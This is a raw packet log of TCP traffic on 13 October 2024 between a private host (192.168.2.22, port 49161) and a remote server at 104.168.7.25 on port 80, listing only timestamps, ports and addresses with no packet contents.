Oct 13, 2024 07:29:00.089385986 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089412928 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089428902 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089447021 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089452982 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089478970 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089494944 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089519024 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089658976 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089910984 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089946032 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089965105 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089977026 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089986086 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.090027094 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.090075970 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.090110064 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.090126038 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.090141058 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.090151072 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.090173006 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.090188026 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.090205908 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.090224028 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.090240002 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.090246916 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.090271950 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.090290070 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.090305090 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.090316057 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.090389013 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.090401888 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.090436935 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.090925932 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.090959072 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.090984106 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091006041 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091008902 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091042042 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091057062 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091074944 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091099024 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091110945 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091120958 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091144085 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091161013 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091176987 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091187000 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091208935 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091228962 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091242075 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091250896 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091274977 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091285944 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091306925 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091322899 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091358900 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091886997 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091912985 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091926098 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091938972 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091947079 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091947079 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091953993 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091969967 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091970921 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091970921 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091986895 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.091999054 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.091999054 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.092005014 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.092020988 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.092025995 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.092037916 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.092052937 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.092052937 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.092052937 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.092068911 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.092072964 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.092082977 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.092099905 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.092099905 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.092119932 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.092607021 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.092622995 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.092638016 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.092662096 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.092662096 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.093117952 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.175530910 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.175642014 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.175677061 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.175708055 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.175740004 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.175772905 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.175780058 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.175780058 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.175780058 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.175780058 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.175780058 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.175807953 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.175839901 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.175868034 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.175868034 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.175873041 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.175895929 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.175915003 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.175925016 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.175959110 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.175980091 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.175991058 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176009893 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176027060 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176029921 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176059961 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176075935 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176093102 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176100016 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176127911 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176146030 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176163912 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176173925 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176214933 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176335096 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176367998 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176387072 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176398993 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176408052 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176431894 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176445961 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176465034 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176476955 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176497936 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176512957 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176532030 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176548004 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176564932 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176587105 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176597118 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176604986 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176629066 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176644087 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176665068 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.176677942 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.176716089 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177119970 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177153111 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177184105 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177187920 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177189112 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177217007 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177222967 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177249908 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177263975 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177298069 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177305937 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177354097 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177473068 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177505016 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177529097 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177550077 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177553892 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177587032 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177602053 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177618980 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177625895 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177650928 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177670956 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177685022 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177699089 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177716970 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177731037 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177751064 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177769899 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177783012 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177794933 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177815914 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177834034 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177849054 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177865982 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177881956 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177889109 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177916050 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.177928925 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.177970886 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178546906 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178586960 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178596973 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178618908 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178639889 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178651094 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178659916 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178683996 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178695917 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178716898 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178735018 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178750038 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178759098 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178781986 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178797960 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178817034 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178822041 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178848982 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178864956 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178880930 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178889036 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178914070 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178934097 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178949118 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178963900 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.178981066 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.178992987 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179027081 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179480076 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179512978 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179536104 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179544926 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179558992 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179577112 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179596901 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179609060 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179617882 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179641008 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179656982 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179673910 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179697037 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179707050 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179716110 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179738998 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179759979 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179771900 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179779053 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179804087 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179817915 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179837942 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179857016 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179869890 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.179882050 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.179918051 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180380106 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180430889 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180442095 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180461884 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180471897 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180495977 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180510044 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180529118 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180541039 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180562019 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180578947 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180596113 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180618048 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180629015 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180639029 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180660009 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180675030 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180692911 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180699110 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180726051 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180743933 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180758953 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180768013 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180790901 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180805922 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180824995 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.180835962 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.180879116 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181418896 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181452036 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181478024 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181483030 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181499958 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181515932 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181523085 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181545019 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181562901 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181576014 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181586981 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181610107 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181623936 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181641102 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181653023 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181654930 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181669950 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181679010 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181684971 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181700945 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181703091 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181703091 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181715965 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181730986 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.181730986 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181730986 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181763887 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.181763887 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.182238102 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.182252884 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.182266951 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.182281971 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.182290077 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.182290077 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.182293892 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.182310104 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.182313919 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.182313919 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.182324886 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.182341099 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.182346106 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.182347059 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.182358980 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.182368994 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.182368994 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.182399988 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266302109 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266392946 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266427040 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266479015 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266511917 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266544104 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266577959 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266578913 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266578913 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266580105 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266580105 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266580105 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266580105 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266609907 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266661882 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266668081 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266668081 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266705990 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266711950 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266745090 CEST	80	49161	104.168.7.25	192.168.2.22
